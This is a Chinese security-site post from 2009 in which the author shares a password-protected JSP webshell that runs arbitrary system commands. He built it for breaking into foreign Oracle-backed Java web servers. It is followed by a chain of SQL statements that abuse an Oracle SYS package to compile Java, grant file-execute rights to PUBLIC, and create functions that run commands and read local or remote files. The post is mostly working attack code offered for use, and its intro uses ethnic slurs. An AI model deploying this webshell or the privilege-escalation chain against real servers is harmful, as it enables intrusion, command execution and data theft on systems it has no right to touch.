首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>本站原创>linux原创>文章内容
改的一个非GBK的JSP的webshell
来源:vfocus.net 作者:vitter 发布时间:2009-10-22  

最近遇到些国外的oracle服务器,其中好多系统的内核无法local root,但是有在root权限下跑的java的web服务,有在web目录写权限,但是经常用的jshell是GBK的,在国外(先是棒子,放过了,后有小鬼子,再后来还有阿三,实在受不了了,自己改一个)的机器上基本不支持该字体,没办法自己改了一个cmd的webshell多加了一个密码认证。

------------------------------淫荡代码分割线------------------------------

<%@ page import="java.io.*" %>
<%
//by: vitter@safechina.net

     String PASS = "vitter";

    String cmd = request.getParameter("cmd");
    String pass = request.getParameter("pass");
    String output = "";

    if (pass != null && pass.trim().length() > 0) {
        if (pass.equals(PASS)) {
            output = "Success";
            request.getSession().setAttribute("loginUser", "loginOk");
        } else {
            output = "password ERR!";
            request.getSession().removeAttribute("loginUser");
        }
    } else if (cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd);
            BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
            while ((s = sI.readLine()) != null) {
                output += s;
            }
        }
        catch (IOException e) {
            e.printStackTrace();
        }
    }

    boolean ifLogin = false;
    Object loingUser = request.getSession().getAttribute("loginUser");
    if (loingUser != null) {
        ifLogin = true;
    }
%>
<FORM METHOD=POST ACTION='vittercmd.jsp'>
    <%
        if (!ifLogin) {
    %>
    Password:<INPUT name='pass' type=password>
    <%
    } else {
    %>
    CMD:<INPUT name='cmd' type=TEXT>
    <%
    }
    %>
    <INPUT type=submit value='Run'>
</FORM>
<hr>
<pre>
    <%=output %>
</pre>

附:oracle提权的小技巧

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*;import java.net.URL; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(filename.startsWith("http")?new InputStreamReader(new URL(filename).openStream()):new FileReader(filename));
String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual ;

select  sys.LinxRunCMD('/bin/cat /etc/issue') from dual ;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·OPENVPN安装手册
·ssh-3.2记录sftp日志,并且chroo
·openssh记录sftp详细日志,并chr
·用linux构建仗剑江湖mud游戏服务
·Linux高可用(HA)集群笔记heartbe
·关于日志记录系统设计思想
·unix入侵及防御心得(一)(2)
·unix入侵及防御心得(一)(1)
·linux下的Informix安装配置
·Informix的数据库优化
·Linux下apache运行mysql,cgi,p
·Linux下安装Oracle817完美解决版
  相关文章
·ssh-3.2记录sftp日志,并且chroo
·Linux下安装Oracle817完美解决版
·Linux下apache运行mysql,cgi,p
·linux下的Informix安装配置
·Informix的数据库优化
·在 RHEL3 上安装 Oracle 10g
·openssh记录sftp详细日志,并chr
·用mod_gzip对Apache1.3做Web压缩
·lvs+heard负载均衡文档(DR)
·Linux高可用(HA)集群笔记heartbe
·OPENVPN安装手册
·unix入侵及防御心得(一)(2)
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved